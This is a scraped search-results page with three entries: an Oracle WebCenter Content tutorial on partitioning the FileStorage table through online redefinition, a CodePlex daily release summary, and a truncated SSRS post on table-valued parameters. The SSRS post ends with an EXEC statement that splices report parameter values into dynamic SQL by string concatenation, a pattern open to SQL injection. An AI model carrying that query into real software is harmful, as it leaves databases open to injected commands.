Search Results

Search found 27946 results on 1118 pages for 'output buffer empty'.


  • Partitioned Repository for WebCenter Content using Oracle Database 11g

    - by Adao Junior
    One of the biggest challenges for content management solutions is storage management, due to the high volume of ever-growing information. Even if you have storage appliances and a lot of terabytes, things like backup, compression, deduplication, storage relocation, encryption and availability can become a nightmare. One standard option you have with Oracle WebCenter Content is to store the data in the database, and the Oracle Database lets you leverage features like compression, deduplication, encryption and seamless backup. But with a huge volume, the challenge is passed to the DBA to keep the WebCenter Content database up and running. One solution is to use database partitions for your content repository, but what are the implications of this? Can I fit this with my business requirements? Well, yes. It is up to you how you manage it; you just need a good plan.
    During your "storage brainstorm plan", keep in mind what you actually need. Do you have to store petabytes of documents? Do you need everything online? Is there a way to logically separate the "good content" from the "legacy content"? The first thing that comes to my mind is to use the creation date of the document, but remember that a document can receive a lot of revisions, so you may want to consider the revision creation date instead. Your plan can also use more complex rules, such as per document type, per custom metadata field (for example department), or a hybrid of date, DocType and a specific virtual folder. Taking this further, you can have your repository distributed across different servers, different disks and different disk types (such as SSD, SAS, SATA, tape, ...), separated according to your business requirements, keeping the "hot" content apart from the legacy content and easily matching your compliance requirements.
    If you decide to separate by revision, the simplest way is to use dId, the sequential unique id of every content item created in WebCenter Content, or dLastModified, the date column of the FileStorage table that records when the content was added to the database table using SecureFiles. Using the scenario of a partitioned repository with a hierarchical separation by date, we will transform the FileStorage table into a partitioned table using "Partition by Range" on the dLastModified column (you can use dId, or a join with other tables for other metadata such as dDocType, security, etc.).
    The test scenario below covers:
    - Previously existing data in the JDBC Storage, to be migrated to the new partitioned JDBC Storage
    - Partitioning by date
    - Automatic generation of new partitions based on a pre-defined interval (available only with Oracle Database 11g and later)
    - Deduplication and compression for legacy data
    - Oracle WebCenter Content 11g PS5 (it may contain some customizations that do not affect the test scenario)
    For the test case you need some data stored using JDBC Storage to act as the "legacy" data. If you have not done this before, just create a storage rule pointing to the JDBC Storage, enable the StorageRule metadata field in the UI and upload some documents using this rule. For this test case you can run as the schema owner or as a DBA user; we will use the schema owner TESTS_OCS. I cannot forget to mention that this is just a test and you should take a proper backup of your environment first.
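    Before granting privileges and starting the redefinition, it can also help to confirm what is already stored through the JDBC Storage rule and how it is spread over time, since that drives the choice of partition boundaries. A minimal sketch, assuming you are connected as the schema owner TESTS_OCS (add a schema prefix otherwise):

    -- How much content is already in FileStorage and what date range it spans
    SELECT COUNT(*) AS content_rows,
           MIN(dLastModified) AS oldest,
           MAX(dLastModified) AS newest
      FROM FileStorage;

    -- Rough per-day distribution, useful when picking the range boundaries
    SELECT TRUNC(dLastModified) AS load_day,
           COUNT(*) AS rows_per_day
      FROM FileStorage
     GROUP BY TRUNC(dLastModified)
     ORDER BY load_day;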
    When you use the schema owner, some extra privileges are needed; grant them using the DBA user:

    REM Grant privileges required for online redefinition.
    GRANT EXECUTE ON DBMS_REDEFINITION TO TESTS_OCS;
    GRANT ALTER ANY TABLE TO TESTS_OCS;
    GRANT DROP ANY TABLE TO TESTS_OCS;
    GRANT LOCK ANY TABLE TO TESTS_OCS;
    GRANT CREATE ANY TABLE TO TESTS_OCS;
    GRANT SELECT ANY TABLE TO TESTS_OCS;
    REM Privileges required to perform cloning of dependent objects.
    GRANT CREATE ANY TRIGGER TO TESTS_OCS;
    GRANT CREATE ANY INDEX TO TESTS_OCS;

    In our test scenario we will separate the content as Legacy, Day1, Day2, Day3 and Future. The last one will be partitioned automatically, using three tablespaces in round-robin mode. In a real scenario the partition rule could be per month, per year or any rule that you choose. Tablespaces for the test scenario:

    CREATE TABLESPACE TESTS_OCS_PART_LEGACY DATAFILE 'tests_ocs_part_legacy.dat' SIZE 500K AUTOEXTEND ON NEXT 500K MAXSIZE UNLIMITED;
    CREATE TABLESPACE TESTS_OCS_PART_DAY1 DATAFILE 'tests_ocs_part_day1.dat' SIZE 500K AUTOEXTEND ON NEXT 500K MAXSIZE UNLIMITED;
    CREATE TABLESPACE TESTS_OCS_PART_DAY2 DATAFILE 'tests_ocs_part_day2.dat' SIZE 500K AUTOEXTEND ON NEXT 500K MAXSIZE UNLIMITED;
    CREATE TABLESPACE TESTS_OCS_PART_DAY3 DATAFILE 'tests_ocs_part_day3.dat' SIZE 500K AUTOEXTEND ON NEXT 500K MAXSIZE UNLIMITED;
    CREATE TABLESPACE TESTS_OCS_PART_ROUND_ROBIN_A DATAFILE 'tests_ocs_part_round_robin_a.dat' SIZE 500K AUTOEXTEND ON NEXT 500K MAXSIZE UNLIMITED;
    CREATE TABLESPACE TESTS_OCS_PART_ROUND_ROBIN_B DATAFILE 'tests_ocs_part_round_robin_b.dat' SIZE 500K AUTOEXTEND ON NEXT 500K MAXSIZE UNLIMITED;
    CREATE TABLESPACE TESTS_OCS_PART_ROUND_ROBIN_C DATAFILE 'tests_ocs_part_round_robin_c.dat' SIZE 500K AUTOEXTEND ON NEXT 500K MAXSIZE UNLIMITED;

    Before starting, gather optimizer statistics on the current FileStorage table:

    EXEC DBMS_STATS.GATHER_TABLE_STATS(USER, 'FileStorage', cascade => TRUE);

    Now check whether it is possible to execute the redefinition process:

    EXEC DBMS_REDEFINITION.CAN_REDEF_TABLE('TESTS_OCS', 'FileStorage', DBMS_REDEFINITION.CONS_USE_PK);

    If there are no error messages, you are good to go. Create a partitioned interim FileStorage table.
    You need to create a new table with the partition information to act as an interim table:

    CREATE TABLE FILESTORAGE_Part (
      DID NUMBER(*,0) NOT NULL ENABLE,
      DRENDITIONID VARCHAR2(30 CHAR) NOT NULL ENABLE,
      DLASTMODIFIED TIMESTAMP (6),
      DFILESIZE NUMBER(*,0),
      DISDELETED VARCHAR2(1 CHAR),
      BFILEDATA BLOB
    )
    LOB (BFILEDATA) STORE AS SECUREFILE ( ENABLE STORAGE IN ROW NOCACHE LOGGING KEEP_DUPLICATES NOCOMPRESS )
    PARTITION BY RANGE (DLASTMODIFIED)
    INTERVAL (NUMTODSINTERVAL(1,'DAY'))
    STORE IN (TESTS_OCS_PART_ROUND_ROBIN_A, TESTS_OCS_PART_ROUND_ROBIN_B, TESTS_OCS_PART_ROUND_ROBIN_C)
    (
      PARTITION FILESTORAGE_PART_LEGACY VALUES LESS THAN (TO_DATE('05-APR-2012 12.00.00 AM', 'DD-MON-YYYY HH.MI.SS AM')) TABLESPACE TESTS_OCS_PART_LEGACY
        LOB (BFILEDATA) STORE AS SECUREFILE ( TABLESPACE TESTS_OCS_PART_LEGACY RETENTION NONE DEDUPLICATE COMPRESS HIGH ),
      PARTITION FILESTORAGE_PART_DAY1 VALUES LESS THAN (TO_DATE('06-APR-2012 07.25.00 PM', 'DD-MON-YYYY HH.MI.SS AM')) TABLESPACE TESTS_OCS_PART_DAY1
        LOB (BFILEDATA) STORE AS SECUREFILE ( TABLESPACE TESTS_OCS_PART_DAY1 RETENTION AUTO KEEP_DUPLICATES COMPRESS ),
      PARTITION FILESTORAGE_PART_DAY2 VALUES LESS THAN (TO_DATE('06-APR-2012 07.55.00 PM', 'DD-MON-YYYY HH.MI.SS AM')) TABLESPACE TESTS_OCS_PART_DAY2
        LOB (BFILEDATA) STORE AS SECUREFILE ( TABLESPACE TESTS_OCS_PART_DAY2 RETENTION AUTO KEEP_DUPLICATES NOCOMPRESS ),
      PARTITION FILESTORAGE_PART_DAY3 VALUES LESS THAN (TO_DATE('06-APR-2012 07.58.00 PM', 'DD-MON-YYYY HH.MI.SS AM')) TABLESPACE TESTS_OCS_PART_DAY3
        LOB (BFILEDATA) STORE AS SECUREFILE ( TABLESPACE TESTS_OCS_PART_DAY3 RETENTION AUTO KEEP_DUPLICATES NOCOMPRESS )
    );

    After the creation you should see your partitions defined. Note that only the fixed range partitions have been created; none of the interval partitions have been created yet. Start the redefinition process:

    BEGIN
      DBMS_REDEFINITION.START_REDEF_TABLE(
        uname => 'TESTS_OCS'
       ,orig_table => 'FileStorage'
       ,int_table => 'FileStorage_PART'
       ,col_mapping => NULL
       ,options_flag => DBMS_REDEFINITION.CONS_USE_PK );
    END;

    This operation can take some time to complete, depending on how much content you have and on the size of the table. Using the DBA user you can check the progress with this command:

    SELECT * FROM v$sesstat WHERE sid = 1;

    Copy the dependent objects:

    DECLARE
      redefinition_errors PLS_INTEGER := 0;
    BEGIN
      DBMS_REDEFINITION.COPY_TABLE_DEPENDENTS(
        uname => 'TESTS_OCS'
       ,orig_table => 'FileStorage'
       ,int_table => 'FileStorage_PART'
       ,copy_indexes => DBMS_REDEFINITION.CONS_ORIG_PARAMS
       ,copy_triggers => TRUE
       ,copy_constraints => TRUE
       ,copy_privileges => TRUE
       ,ignore_errors => TRUE
       ,num_errors => redefinition_errors
       ,copy_statistics => FALSE
       ,copy_mvlog => FALSE );
      IF (redefinition_errors > 0) THEN
        DBMS_OUTPUT.PUT_LINE('>>> FileStorage to FileStorage_PART temp copy Errors: ' || TO_CHAR(redefinition_errors));
      END IF;
    END;

    With the DBA user, verify that there are no errors:

    SELECT object_name, base_table_name, ddl_txt FROM DBA_REDEFINITION_ERRORS;

    Note that this will show two lines related to the constraints; this is expected.
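    Before synchronizing and finishing the redefinition, you can also sanity-check that the interim table has picked up the data and the cloned indexes. A hedged sketch (row counts will not match exactly if documents are still being checked in; the SYNC_INTERIM_TABLE call below catches up any drift):

    -- Compare row counts between the original and the interim table
    SELECT (SELECT COUNT(*) FROM FileStorage)      AS original_rows,
           (SELECT COUNT(*) FROM FileStorage_PART) AS interim_rows
      FROM dual;

    -- Indexes cloned onto the interim table by COPY_TABLE_DEPENDENTS
    SELECT index_name, status
      FROM user_indexes
     WHERE table_name = 'FILESTORAGE_PART';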
    Synchronize the interim table FileStorage_PART:

    BEGIN
      DBMS_REDEFINITION.SYNC_INTERIM_TABLE(
        uname => 'TESTS_OCS',
        orig_table => 'FileStorage',
        int_table => 'FileStorage_PART');
    END;

    Gather statistics on the new table:

    EXEC DBMS_STATS.GATHER_TABLE_STATS(USER, 'FileStorage_PART', cascade => TRUE);

    Complete the redefinition:

    BEGIN
      DBMS_REDEFINITION.FINISH_REDEF_TABLE(
        uname => 'TESTS_OCS',
        orig_table => 'FileStorage',
        int_table => 'FileStorage_PART');
    END;

    During the execution the FileStorage table is locked in exclusive mode until the operation finishes. After the last command the FileStorage table is partitioned. If you have content outside the defined ranges, you should see the new partitions created automatically rather than an error, even if you "forgot" to create all the future ranges. You can now drop the FileStorage_PART table:

    DROP TABLE FileStorage_PART PURGE;

    To check that the FileStorage table is valid and partitioned, use:

    SELECT num_rows, partitioned FROM user_tables WHERE table_name = 'FILESTORAGE';

    You can list the content of the FileStorage table in a specific partition, for example:

    SELECT * FROM FileStorage PARTITION (FILESTORAGE_PART_LEGACY);

    Some useful commands that you can use to check the partitions (note that you need to run them as a DBA user):

    SELECT * FROM DBA_TAB_PARTITIONS WHERE table_name = 'FILESTORAGE';
    SELECT * FROM DBA_TABLESPACES WHERE tablespace_name LIKE 'TESTS_OCS%';

    After the redefinition process completes, you have a new FileStorage table that stores all content whose storage rule points to the JDBC Storage, partitioned according to the rules defined when the temporary interim FileStorage_PART table was created. At this point you can test WebCenter Content by downloading documents (original and renditions). Note that the content could already be in the cache area; take a look in the weblayout directory to see whether a file with the same id is there, then click on the web rendition of your test file and check that the file has been created and can be opened. If so, everything is working. The redefinition process can be repeated many times, which lets you test which layout works better, over and over again.
    Now some interesting maintenance actions related to the partitions:
    Make a tablespace read only. There are no issues viewing the content, since WebCenter Content does not alter the revisions. When you try to delete a content item that is part of a read-only tablespace, an error occurs and the document is not deleted. The only way to prevent these errors today is to create a custom component that checks the partitions and, if a document lives in a "read only" repository, executes the deletion of the metadata and marks the document to be deleted during the next database maintenance, such as a new redefinition.
    Take a tablespace offline, for archiving purposes or any other reason.
    When you try to open a document stored in this tablespace, you will receive an error saying that the content could not be retrieved, but the other, online tablespaces are not affected. The behavior is the same when deleting documents. Again, a custom component is the solution: if a document is "out of range", the component can show a message explaining that the repository for that document is offline. This can be extended with an option for the user to request that the content be put online again.
    Move some legacy content to an offline repository (table), using the exchange option to move the content from one partition to an empty non-partitioned table such as FileStorage_LEGACY (a SQL sketch follows below). Note that this option removes the rows from FileStorage, so WebCenter Content will no longer be able to open the stored content. You always need to keep the indexes and constraints in mind.
    A redefinition that separates the original content (vault) from the renditions and, at the same time, separates by date. This could be an option for DAM environments that want a special place for the renditions and put the original files on storage with lower performance. The process is the same; you just need to change the script of the interim table to use composite partitioning. It will be something like:

    CREATE TABLE FILESTORAGE_RenditionPart (
      DID NUMBER(*,0) NOT NULL ENABLE,
      DRENDITIONID VARCHAR2(30 CHAR) NOT NULL ENABLE,
      DLASTMODIFIED TIMESTAMP (6),
      DFILESIZE NUMBER(*,0),
      DISDELETED VARCHAR2(1 CHAR),
      BFILEDATA BLOB
    )
    LOB (BFILEDATA) STORE AS SECUREFILE ( ENABLE STORAGE IN ROW NOCACHE LOGGING KEEP_DUPLICATES NOCOMPRESS )
    PARTITION BY LIST (DRENDITIONID)
    SUBPARTITION BY RANGE (DLASTMODIFIED)
    (
      PARTITION Vault VALUES ('primaryFile')
      (
        SUBPARTITION FILESTORAGE_VAULT_LEGACY VALUES LESS THAN (TO_DATE('05-APR-2012 12.00.00 AM', 'DD-MON-YYYY HH.MI.SS AM')) LOB (BFILEDATA) STORE AS SECUREFILE,
        SUBPARTITION FILESTORAGE_VAULT_DAY1 VALUES LESS THAN (TO_DATE('06-APR-2012 07.25.00 PM', 'DD-MON-YYYY HH.MI.SS AM')) LOB (BFILEDATA) STORE AS SECUREFILE,
        SUBPARTITION FILESTORAGE_VAULT_DAY2 VALUES LESS THAN (TO_DATE('06-APR-2012 07.55.00 PM', 'DD-MON-YYYY HH.MI.SS AM')) LOB (BFILEDATA) STORE AS SECUREFILE,
        SUBPARTITION FILESTORAGE_VAULT_DAY3 VALUES LESS THAN (TO_DATE('06-APR-2012 07.58.00 PM', 'DD-MON-YYYY HH.MI.SS AM')) LOB (BFILEDATA) STORE AS SECUREFILE,
        SUBPARTITION FILESTORAGE_VAULT_FUTURE VALUES LESS THAN (MAXVALUE)
      ),
      PARTITION WebLayout VALUES ('webViewableFile')
      (
        SUBPARTITION FILESTORAGE_WEBLAYOUT_LEGACY VALUES LESS THAN (TO_DATE('05-APR-2012 12.00.00 AM', 'DD-MON-YYYY HH.MI.SS AM')) LOB (BFILEDATA) STORE AS SECUREFILE,
        SUBPARTITION FILESTORAGE_WEBLAYOUT_DAY1 VALUES LESS THAN (TO_DATE('06-APR-2012 07.25.00 PM', 'DD-MON-YYYY HH.MI.SS AM')) LOB (BFILEDATA) STORE AS SECUREFILE,
        SUBPARTITION FILESTORAGE_WEBLAYOUT_DAY2 VALUES LESS THAN (TO_DATE('06-APR-2012 07.55.00 PM', 'DD-MON-YYYY HH.MI.SS AM')) LOB (BFILEDATA) STORE AS SECUREFILE,
        SUBPARTITION FILESTORAGE_WEBLAYOUT_DAY3 VALUES LESS THAN (TO_DATE('06-APR-2012 07.58.00 PM', 'DD-MON-YYYY HH.MI.SS AM')) LOB (BFILEDATA) STORE AS SECUREFILE,
        SUBPARTITION FILESTORAGE_WEBLAYOUT_FUTURE VALUES LESS THAN (MAXVALUE)
      ),
      PARTITION Special VALUES ('Special')
      (
        SUBPARTITION FILESTORAGE_SPECIAL_LEGACY VALUES LESS THAN (TO_DATE('05-APR-2012 12.00.00 AM', 'DD-MON-YYYY HH.MI.SS AM')) LOB (BFILEDATA) STORE AS SECUREFILE,
        SUBPARTITION FILESTORAGE_SPECIAL_DAY1 VALUES LESS THAN (TO_DATE('06-APR-2012 07.25.00 PM', 'DD-MON-YYYY HH.MI.SS AM')) LOB (BFILEDATA) STORE AS SECUREFILE,
        SUBPARTITION FILESTORAGE_SPECIAL_DAY2 VALUES LESS THAN (TO_DATE('06-APR-2012 07.55.00 PM', 'DD-MON-YYYY HH.MI.SS AM')) LOB (BFILEDATA) STORE AS SECUREFILE,
        SUBPARTITION FILESTORAGE_SPECIAL_DAY3 VALUES LESS THAN (TO_DATE('06-APR-2012 07.58.00 PM', 'DD-MON-YYYY HH.MI.SS AM')) LOB (BFILEDATA) STORE AS SECUREFILE,
        SUBPARTITION FILESTORAGE_SPECIAL_FUTURE VALUES LESS THAN (MAXVALUE)
      )
    ) ENABLE ROW MOVEMENT;
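    For the simpler maintenance actions above (read-only tablespace, offline tablespace, partition exchange), the corresponding SQL looks roughly like the following. This is a hedged sketch: the partition and tablespace names come from this test scenario, and the offline table FileStorage_LEGACY is assumed to already exist with the same column and LOB layout as FileStorage.

    -- Make the legacy tablespace read only (content stays viewable)
    ALTER TABLESPACE TESTS_OCS_PART_LEGACY READ ONLY;

    -- Take the legacy tablespace offline for archiving, and bring it back later
    ALTER TABLESPACE TESTS_OCS_PART_LEGACY OFFLINE NORMAL;
    ALTER TABLESPACE TESTS_OCS_PART_LEGACY ONLINE;

    -- Swap the legacy partition with the empty non-partitioned table
    ALTER TABLE FileStorage
      EXCHANGE PARTITION FILESTORAGE_PART_LEGACY
      WITH TABLE FileStorage_LEGACY
      INCLUDING INDEXES WITHOUT VALIDATION;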
    The next post related to the partitioned repository will come with a sample component to handle the possible exceptions when you need to take a tablespace/partition offline or move it to another place. We can also include some integration with Retention Management and Records Management. Another subject related to partitioning is the ability to create a FileStore Provider pointed to a different database, raising the level of distributed storage vs. performance. Let us know if this is important to you, or leave a comment if you have a use case that is not listed. Cross-posted on the blog.ContentrA.com


  • CodePlex Daily Summary for Saturday, April 07, 2012

    CodePlex Daily Summary for Saturday, April 07, 2012
    Popular Releases
    Harness - Internet Explorer Automation: Harness 2.0.3: support the operation of frameset, frame and iframe Add commands SwitchFrame GetUrl GoBack GoForward Refresh SetTimeout GetTimeout Rename commands GetActiveWindow to GetActiveBrowser SetActiveWindow to SetActiveBrowser FindWindowAll to FindBrowser NewWindow to NewBrowser GetMajorVersion to GetVersion
    Better Explorer: Better Explorer 2.0.0.861 Alpha: - fixed new folder button operation not work well in some situations - removed some unnecessary code like subclassing that is not needed anymore - Added option to make Better Explorer default (at least for WIN+E operations) - Added option to enable file operation replacements (like Terracopy) to work with Better Explorer - Added some basic usability to "Share" button - Other fixes
    LightFarsiDictionary - ??????? ??? ?????/???????: LightFarsiDictionary - v1: LightFarsiDictionary - v1
    WPF Application Framework (WAF): WPF Application Framework (WAF) 2.5.0.3: Version: 2.5.0.3 (Milestone 3): This release contains the source code of the WPF Application Framework (WAF) and the sample applications. Requirements .NET Framework 4.0 (The package contains a solution file for Visual Studio 2010) The unit test projects require Visual Studio 2010 Professional Changelog Legend: [B] Breaking change; [O] Marked member as obsolete [O] WAF: Mark the StringBuilderExtensions class as obsolete because the AppendInNewLine method can be replaced with string.Jo...
    RiP-Ripper & PG-Ripper: RiP-Ripper 2.9.30: changes NEW: Added Support for "DirectUpload.net" links NEW: Added Support for "PixRoute.com" links NEW: Added Support for "ImagePicasa.com" links FIXED: "PixHub.eu" links
    Community TFS Build Extensions: April 2012: Release notes to follow...
    ClosedXML - The easy way to OpenXML: ClosedXML 0.65.2: Aside from many bug fixes we now have Conditional Formatting The conditional formatting was sponsored by http://www.bewing.nl (big thanks) New on v0.65.1 Fixed issue when loading conditional formatting with default values for icon sets New on v0.65.2 Fixed issue loading conditional formatting Improved inserts performance
    Liberty: v3.2.0.0 Release 4th April 2012: Change Log -Added -Halo 3 support (invincibility, ammo editing) -Halo 3: ODST support (invincibility, ammo editing) -The file transfer page now shows its progress in the Windows 7 taskbar -"About this build" settings page -Reach Change what an object is carrying -Reach Change which node a carried object is attached to -Reach Object node viewer and exporter -Reach Change which weapons you are carrying from the object editor -Reach Edit the weapon controller of vehicles and turrets -An error dia...
    MSBuild Extension Pack: April 2012: Release Blog Post The MSBuild Extension Pack April 2012 release provides a collection of over 435 MSBuild tasks. A high level summary of what the tasks currently cover includes the following: System Items: Active Directory, Certificates, COM+, Console, Date and Time, Drives, Environment Variables, Event Logs, Files and Folders, FTP, GAC, Network, Performance Counters, Registry, Services, Sound Code: Assemblies, AsyncExec, CAB Files, Code Signing, DynamicExecute, File Detokenisation, GUID’...
    DotNetNuke® Community Edition CMS: 06.01.05: Major Highlights Fixed issue that stopped users from creating vocabularies when the portal ID was not zero Fixed issue that caused modules configured to be displayed on all pages to be added to the wrong container in new pages Fixed page quota restriction issue in the Ribbon Bar Removed restriction that would not allow users to use a dash in page names. Now users can create pages with names like "site-map" Fixed issue that was causing the wrong container to be loaded in modules wh...
    51Degrees.mobi - Mobile Device Detection and Redirection: 2.1.3.1: One Click Install from NuGet Changes to Version 2.1.3.11. [assembly: AllowPartiallyTrustedCallers] has been added back into the AssemblyInfo.cs file to prevent failures with other assemblies in Medium trust environments. 2. The Lite data embedded into the assembly has been updated to include devices from December 2011. The 42 new RingMark properties will return Unknown if RingMark data is not available. Changes to Version 2.1.2.11Code Changes 1. The project is now licenced under the Mozilla...
    MVC Controls Toolkit: Mvc Controls Toolkit 2.0.0: Added Support for Mvc4 beta and WebApi The SafeqQuery and HttpSafeQuery IQueryable implementations that work as wrappers around any IQueryable to protect it from unwished queries. "Client Side" pager specialized in paging javascript data coming either from a remote data source, or from local data. LinQ like fluent javascript api to build queries either against remote data sources, or against local javascript data, with exactly the same interface. There are 3 different query objects exp...
    ExtAspNet: ExtAspNet v3.1.2: ExtAspNet - ?? ExtJS ??? ASP.NET 2.0 ???,????? AJAX ?????????? ExtAspNet ????? ExtJS ??? ASP.NET 2.0 ???,????? AJAX ??????????。 ExtAspNet ??????? JavaScript,?? CSS,?? UpdatePanel,?? ViewState,?? WebServices ???????。 ??????: IE 7.0, Firefox 3.6, Chrome 3.0, Opera 10.5, Safari 3.0+ ????:Apache License 2.0 (Apache) ??:http://extasp.net/ ??:http://bbs.extasp.net/ ??:http://extaspnet.codeplex.com/ ??:http://sanshi.cnblogs.com/ ????: +2012-04-04 v3.1.2 -??IE?????????????BUG(??"about:blank"?...
    nopCommerce. Open source shopping cart (ASP.NET MVC): nopcommerce 2.50: Highlight features & improvements: • Significant performance optimization. • Allow store owners to create several shipments per order. Added a new shipping status: “Partially shipped”. • Pre-order support added. Enables your customers to place a Pre-Order and pay for the item in advance. Displays “Pre-order” button instead of “Buy Now” on the appropriate pages. Makes it possible for customer to buy available goods and Pre-Order items during one session. It can be managed on a product variant ...
    WiX Toolset: WiX v3.6 RC0: WiX v3.6 RC0 (3.6.2803.0) provides support for VS11 and a more stable Burn engine. For more information see Rob's blog post about the release: http://robmensching.com/blog/posts/2012/4/3/WiX-v3.6-Release-Candidate-Zero-available
    SageFrame: SageFrame 2.0: Sageframe is an open source ASP.NET web development framework developed using ASP.NET 3.5 with service pack 1 (sp1) technology. It is designed specifically to help developers build dynamic websites by providing core functionality common to most web applications.
    iTuner - The iTunes Companion: iTuner 1.5.4475: Fix to parse empty playlists in iTunes Library
    Document.Editor: 2012.2: Whats New for Document.Editor 2012.2: New Save Copy support New Page Setup support Minor Bug Fix's, improvements and speed ups
    VidCoder: 1.3.2: Added option for the minimum title length to scan. Added support to enable or disable LibDVDNav. Added option to prompt to delete source files after clearing successful completed items. Added option to disable remembering recent files and folders. Tweaked number box to only select all on a quick click.
    MJP's DirectX 11 Samples: Light Indexed Deferred Rendering: Implements light indexed deferred using per-tile light lists calculated in a compute shader, as well as a traditional deferred renderer that uses a compute shader for per-tile light culling and per-pixel shading.
    New Projects
    Advertising Management: Advertising management software
    Agile Compact Database: It is database for all.
    AssemblyTransformer: AssemblyTransformer is a tool for modifying .NET assemblies using Mono Cecil. It handles the entire transformation process including strong name signing and offers a simple command-line interface and a basic framework for creating and configuring specific transformations.
    Cafe For You: Software for presenting and managing a cafe
    Client-side Templated Script Control: Allows a developer to add a repeater-style templated list control to a web page that will be data bound client-side, and may respond to client events. The control may be data bound by a web service call on initialization, and may also have its data source set via client code.
    CRM Project - Beginner Sample: Sample to help beginners to start in C# development.
    Deployment Made Easy: The goal of this project is to make deployments to windows servers easy using the web deployment tool
    EasyCMS: EasyCMS
    Excel to SQL Server Database Bulk Transfer: Quick and simple WPF tool to allow users export data from an Excel spreadsheet to a SQL Server database table. Provided as is. But if you need any help let me know.
    HTML Client demo for WCF RIA Services: Demo application with HTML client (upshot.js + knockout.js) on WCF RIA Services
    KOI: Kinect Open Interface: Kinect Open Interface, KOI, provides a way to detect and have the user confirm 11 gestures for your UI. Please read my blog for info: http://www.kinecthelp.com/2012/04/koi-kinect-open-interface.html
    LazyWinAdmin: LazyWinAdmin is a Powershell script to manage local or remote machine resources.
    LCDSmartie dll to display Audio spectrum on Windows 7: An LCDSmartie plugin that displays anything being played as an audio spectrum.
    LiveHelpChatApp: With Live chat help you can provide online / offline help to your client; it has facebook style chat for online and offline users. Download and Enjoy
    MailSender: Small tool for sending mail messages containing multiple attachments with a total size bigger than the allowed size. You can drag'n'drop attachments and click send; the application splits all attachments into parts and sends them separately. There is no address book yet.
    Mauricio: Mauricio Lima Page
    Middleware and Enterprise services foundation: Define a model of deployment and management for Middleware and enterprise applications
    MyFirstPro: This is a test proj
    Old Games Launcher: Old Games Launcher is a combined DosBox frontend & a Direct Draw game/application starter.
    Pharmakos Studio: Pharmakos Studio is an extensible IDE. It was originally written specifically as an UnrealScript editor for the UDK, however it is being written so that any language can be supported via plugins.
    Proyecto Eclipse-Android: Projects with Eclipse-Android
    Proyectos II: Project for a pharmacy
    pullsource: pull source directsource filter
    Quizzer: Awesome program for quizzes and tests.
    Solution Settings for Visual Studio: Solution Settings for Visual Studio allows a file containing settings such as formatting, fonts and colors to be included with a project. When the solution is opened, these settings are automatically applied, and when it is closed, the changes are reverted.
    sundance: test test test
    Webcomic Reader: A little Idea for an on-, and offline usable, touch-friendly Windows 7 Webcomic Reader.
    WinRT PathTextBlock: WinRT PathTextBlock is a control that overcomes some of the limitations in the built in WinRT TextBlock, such as not being able to outline the text, and not being able to distort the text, for example to draw it along a circle. Previously, you could use a tool like Expression Design to create the text and export it as a Path, but this wouldn't work for text that needed to be specified at run time. This control allows you to specify the Text property and it will generate the proper Path obj...
    Yaplex open source projects: Yaplex open source projects
    ????API SDK-VB6(oauth2): ????API SDK-VB6(oauth2)
    ????????API SDK VB6: ??????????API SDK vb?


  • Using Table-Valued Parameters With SQL Server Reporting Services

    - by Jesse
    In my last post I talked about using table-valued parameters to pass a list of integer values to a stored procedure without resorting to using comma-delimited strings and parsing out each value into a TABLE variable. In this post I’ll extend the “Customer Transaction Summary” report example to see how we might leverage this same stored procedure from within an SQL Server Reporting Services (SSRS) report. I’ve worked with SSRS off and on for the past several years and have generally found it to be a very useful tool for building nice-looking reports for end users quickly and easily. That said, I’ve been frustrated by SSRS from time to time when seemingly simple things are difficult to accomplish or simply not supported at all. I thought that using table-valued parameters from within a SSRS report would be simple, but unfortunately I was wrong. Customer Transaction Summary Example Let’s take the “Customer Transaction Summary” report example from the last post and try to plug that same stored procedure into an SSRS report. Our report will have three parameters: Start Date – beginning of the date range for which the report will summarize customer transactions End Date – end of the date range for which the report will summarize customer transactions Customer Ids – One or more customer Ids representing the customers that will be included in the report The simplest way to get started with this report will be to create a new dataset and point it at our Customer Transaction Summary report stored procedure (note that I’m using SSRS 2012 in the screenshots below, but there should be little to no difference with SSRS 2008): When you initially create this dataset the SSRS designer will try to invoke the stored procedure to determine what the parameters and output fields are for you automatically. As part of this process the following dialog pops-up: Obviously I can’t use this dialog to specify a value for the ‘@customerIds’ parameter since it is of the IntegerListTableType user-defined type that we created in the last post. Unfortunately this really throws the SSRS designer for a loop, and regardless of what combination of Data Type, Pass Null Value, or Parameter Value I used here, I kept getting this error dialog with the message, "Operand type clash: nvarchar is incompatible with IntegerListTableType". This error message makes some sense considering that the nvarchar type is indeed incompatible with the IntegerListTableType, but there’s little clue given as to how to remedy the situation. I don’t know for sure, but I think that behind-the-scenes the SSRS designer is trying to give the @customerIds parameter an nvarchar-typed SqlParameter which is causing the issue. When I first saw this error I figured that this might just be a limitation of the dataset designer and that I’d be able to work around the issue by manually defining the parameters. I know that there are some special steps that need to be taken when invoking a stored procedure with a table-valued parameter from ADO .NET, so I figured that I might be able to use some custom code embedded in the report  to create a SqlParameter instance with the needed properties and value to make this work, but the “Operand type clash" error message persisted. The Text Query Approach Just because we’re using a stored procedure to create the dataset for this report doesn’t mean that we can’t use the ‘Text’ Query Type option and construct an EXEC statement that will invoke the stored procedure. 
    In order for this to work properly the EXEC statement will also need to declare and populate an IntegerListTableType variable to pass into the stored procedure. Before I go any further I want to make one point clear: this is a really ugly hack and it makes me cringe to do it. Simply put, I strongly feel that it should not be this difficult to use a table-valued parameter with SSRS. With that said, let’s take a look at what we’ll have to do to make this work.
    Manually Define Parameters
    First, we’ll need to manually define the parameters for the report by right-clicking on the ‘Parameters’ folder in the ‘Report Data’ window. We’ll need to define the ‘@startDate’ and ‘@endDate’ as simple date parameters. We’ll also create a parameter called ‘@customerIds’ that will be a multi-valued Integer parameter. In the ‘Available Values’ tab we’ll point this parameter at a simple dataset that just returns the CustomerId and CustomerName of each row in the Customers table of the database, or manually define a handful of Customer Id values to make available when the report runs. Once we have these parameters properly defined we can take another crack at creating the dataset that will invoke the ‘rpt_CustomerTransactionSummary’ stored procedure. This time we’ll choose the ‘Text’ query type option and put the following into the ‘Query’ text area:
    1: exec('declare @customerIdList IntegerListTableType ' + @customerIdInserts +
    2: ' EXEC rpt_CustomerTransactionSummary
    3: @startDate=''' + @startDate + ''',
    4: @endDate='''+ @endDate + ''',
    5: @customerIds=@customerIdList')
    By using the ‘Text’ query type we can enter any arbitrary SQL that we want to and then use parameters and string concatenation to inject pieces of that query at run time. It can be a bit tricky to parse this out at first glance, but from the SSRS designer’s point of view this query defines three parameters:
